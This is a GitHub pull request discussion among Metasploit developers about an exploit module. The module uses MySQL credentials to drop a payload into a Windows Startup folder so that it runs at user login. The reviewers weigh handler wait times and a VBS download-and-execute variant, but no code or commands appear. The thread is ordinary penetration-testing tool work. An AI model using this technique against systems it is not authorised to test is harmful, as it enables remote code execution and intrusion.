New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Shameless variation (ripoff) on sinn3r's mysql_mof.rb module. #2156
Conversation
Thanks for the variant. I find the approach rather interesting, but I'd like to briefly discuss maybe there's a different way to implement your technique? Specifically the part where you have to set WfsDelay at a high value, and hopefully the user will login before time runs out. I was thinking maybe you can start up a HTTP server first using the HttpServer mixin, login to your target's MySQL and then drop a VBS script that will download+execute your actual executable from the HTTP server. That way your exploit module can wait indefinitely until the user logs in, so you no longer have to worry about time running out. |
Wasn't nuts about the idea of setting WfsDelay to 259,200 either. ;) Sounds like a good idea to me. I'll get to coding and testing it this afternoon. |
Since you can't ensure which there is going to be a session back, even when the target is vulnerable, it looks a little like a "fileformat" exploit, where the msf user is responsible of running a handler in order to get the sessions. Has it sense? Maybe it also could be just an auxiliary module, which just drops files to the startups folders, and the msf user is responsible of running a handler to get sessions if he drops metasploit payloads. Just sharing thoughts :) This comment ISN'T a recommendation to modify this pull request! Is just discussion because I think it's an interesting topic. BTW, there are other exploits on the framework which drop payload to Startup folders, like modules/exploits/windows/browser/enjoysapgui_comp_download.rb, modules/exploits/windows/browser/persits_xupload_traversal.rb, modules/exploits/windows/browser/symantec_altirideployment_downloadandinstall.rb, modules/exploits/windows/browser/zenturiprogramchecker.rb, modules/exploits/windows/misc/timbuktu_fileupload.rb, or modules/exploits/windows/fileformat/foxit_reader_filewrite.rb |
Why not copy the bits from multi/handler exploit function and just wait for a response? Or make an indefinite_handler mixin to handle this? Or allow a WFSDelay -1 or 0 to wait indefinitely? Or how does ::Remote::TcpServer prevent the handler from closing? Ideally having additional download and execute HTTP channels should be avoided as its another channel of communication that you have to get out from the host imo. |
Meatballs1 - I'm not sure if you want WFSDelay to wait indefinitely because if this is used in autoexploit, I think it'll hang. |
But an exploit that is unlikely to get an immediate response shouldn't be targeted in any auto-exploitation? |
Exploits with a high WFSDelay value definitely get loaded by autoexploit. I can tell you how much I believe autoexploit needs a rewrite, but I don't think we can solve that today... or any day soon. |
Whose autoexploit? Long running exploits are a thing sometimes, so it's up
|
Pro's. Adding log running exploits only makes the user experience worse, so I'd avoid doing that. This is obviously commercial team's problem, but you can't cause something unusable and tell them to suck it :-) "Them" includes your users, too. |
While I appreciate the concern, Pro's auto exploit mechanism has a user setting of I just don't want to slide into the business of accepting or denying useful open source exploits just because Pro might have a problem with it, since that kind of undercuts the credibility of Metasploit Framework as a truly free and open source platform for exploitation. @trosen-r7 feel free to confirm or deny. Tl;dr: if Incidentally, Pro (and Community) users also have the option of single exploit tasks; in this case, I want them to be able to run our exploits in the cases where it makes sense. |
*slight edits on my comment for grammer |
We're not denying anything. We're simply looking for a different way to write it. The main issue is that eventually the wait time eventually runs out, and you miss getting a shell. It's better to just wait until the user logs in. |
Oh, okay. I thought you were resisting a long WfsDelay because of concerns about long-running autoexploit functions, not because there's just a better way in general. If there's a better way, by all means. |
@jvazquez-r7 - I see what you're driving at with regards to this behaving like a "fileformat" exploit (needs to wait for user interaction). My motivation for submitting this though was to provide msf users (who have obtained creds to a MySQL/Windows instance) another option for remote code exec since WbemExec doesn't support Vista+ yet. Writing to the file system as SYSTEM is just too good to pass up. :) So from an msf user's workflow standpoint, I would like to see it stay in exploit/windows/mysql as an alternative to mysql_payload and mysql_mof. |
Currently this module, #1054 and possibly #2162 could use some form of indefinite wait for the handler. Should we look to provide a mixin for Msf::Exploit::IndefiniteWait or something? Or do we want to stick with the status quo (for file formats) that the user has to create their own multi-handler? This seems a bit backwards to me as you basically have to re-input your payload settings twice. Make a mistake on the port/payload type and things will fail. |
@Meatballs1 - Your idea makes sense to me. Would it be as simple as grabbing the code from multi/handler's exploit method and tweaking it a bit? |
What's up with this PR? :) |
Not sure. It works, as is, for me. Totally understand if this doesn't
|
Nah, it's definitely useful. I think we just need to spend more time with it. Easy to let things languish accidentally. |
Well, this PR has had a year to think things over and reflect on its inner self. We should close it or land it. |
Offhand, there are a few issues:
|
@veritysr Do you want to take a crack at finishing this, or should we close the PR for now? |
I'll make time to make those changes if there's still interest in including . |
Thanks! Let me know when this is ready for another round and apologies for the delay. |
On windows XP SP3:
On Windows 7:
|
I'm going to make configurable the folder for the startup folder, do minor clenup and land! work in progress! |
Landed after some cleanup, see final result here: 3d20ea8 On XP SP3:
Thanks @veritysr (sorry for the long delay) and everyone who helped to review , finally landed! :-) |
My bad for not testing more thoroughly. Thank you, @jvazquez-r7!
|
@sinn3r - Haven't got WbemExec working on Vista+ yet. Came up with this though.